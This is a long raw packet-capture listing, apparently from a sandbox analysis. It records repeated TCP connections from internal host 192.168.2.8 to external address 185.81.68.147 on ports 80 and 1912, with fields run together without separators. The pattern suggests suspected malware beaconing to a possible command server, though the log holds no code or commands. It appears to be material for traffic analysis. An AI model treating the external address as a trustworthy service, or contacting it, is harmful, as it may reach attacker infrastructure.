                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.334140062 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.334170103 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.338891983 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.338995934 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.339046955 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.343729973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.343806982 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.343830109 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.348576069 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.348603964 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.348651886 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.353396893 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.353430033 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.353444099 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.358310938 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.358355999 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.358489037 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.363141060 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.363185883 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.363204002 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.367887020 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.367933035 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.367947102 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.372742891 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.372793913 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.372802973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.377871990 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.377887964 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.377929926 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.381443977 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.381493092 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.381550074 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.385451078 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.385514021 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.385639906 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.700968027 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.701020956 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.702759027 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.702840090 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.702882051 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.705094099 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.705157042 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.705203056 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.706888914 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.706959963 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.708069086 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.708722115 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.708843946 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.710649014 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.710727930 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.710787058 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.712558985 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.712620974 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.712661028 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714014053 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714427948 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714518070 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714582920 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.716310978 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.716422081 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.716463089 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.718242884 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.718343973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.718419075 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.719954967 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.720077991 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.721762896 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.721824884 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.721905947 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.723685026 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.723764896 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.723866940 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.724009037 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.726360083 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.726480961 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.726537943 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.727015972 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.727123022 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.727174997 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.728883982 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.728920937 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.729334116 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.730505943 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.730618954 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.732022047 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.732238054 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.732444048 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734045029 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734101057 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734133959 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734158039 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.735831022 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.735887051 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.735949993 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.737570047 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.737797976 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.738544941 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.739264011 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.739342928 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.739389896 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.740977049 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.741033077 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.741084099 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.742686987 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.742820024 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.744405031 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.744851112 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.744976044 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.746193886 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.746251106 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.746309996 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.747936010 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.747994900 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.748050928 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.748092890 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.749762058 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.749819040 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.750020981 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.751478910 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.751627922 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.751679897 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.753196001 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.753406048 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.753622055 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.754961967 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.755034924 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.755325079 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.756644964 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.756747961 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.756807089 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.758373976 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.758523941 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.758599043 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.843183994 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.843265057 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.843328953 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.919409037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.963172913 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.963258028 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.084553003 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.237087011 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.240256071 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.360701084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.677354097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.725243092 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.451704025 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.451792955 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.453979969 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.477981091 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.587901115 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.600929022 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.710839033 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.713570118 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.713570118 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.794898987 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.833292007 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.833981991 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.917843103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.956082106 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.245104074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.245593071 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.366055965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.685065031 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.685905933 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.805675030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.128537893 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.159621000 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.355389118 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.355550051 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.356360912 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.356499910 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.458471060 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.476203918 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.580559015 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.581036091 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.581036091 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.700984001 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.701143026 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.821011066 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.012465000 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.012542009 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.013775110 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.016763926 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.129611969 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.138014078 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.249525070 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.249644995 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.249710083 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.369620085 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.369688034 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.489645958 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.866368055 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.866579056 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.866689920 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.878808022 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.996803999 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.998826981 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.116945028 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.117048025 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.117160082 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.238147974 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.238224983 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.359663010 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.714298010 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.714317083 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.714411974 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.716026068 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.817298889 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.835932970 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.937335014 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.937511921 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.937633038 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:30.059750080 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:30.060058117 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:30.181723118 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.386472940 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.386599064 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.386650085 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.387959957 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.489016056 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.507664919 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.608994007 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.609251022 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.609347105 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.729135990 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.729286909 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.849158049 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.076090097 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.076129913 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.076257944 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.077523947 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.069376945 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.116713047 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.223496914 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.236583948 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.343213081 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.343333006 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.343363047 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.463176966 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.463334084 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.583165884 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.799954891 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.800090075 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.800179005 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.801512003 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.911036968 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.921344995 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.030774117 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.030884981 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.030926943 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.150846004 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.151540995 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.271553993 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.634978056 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.635107994 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.636110067 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.636110067 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.738918066 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.756057978 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.858680010 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.858781099 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.858864069 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.978668928 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.978751898 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:57.098953009 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.508359909 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.508486986 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.508599043 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.509802103 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.614702940 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.629491091 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.734536886 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.734680891 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.734740973 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.854844093 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.854907990 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.974567890 CET8049739185.81.68.147192.168.2.8
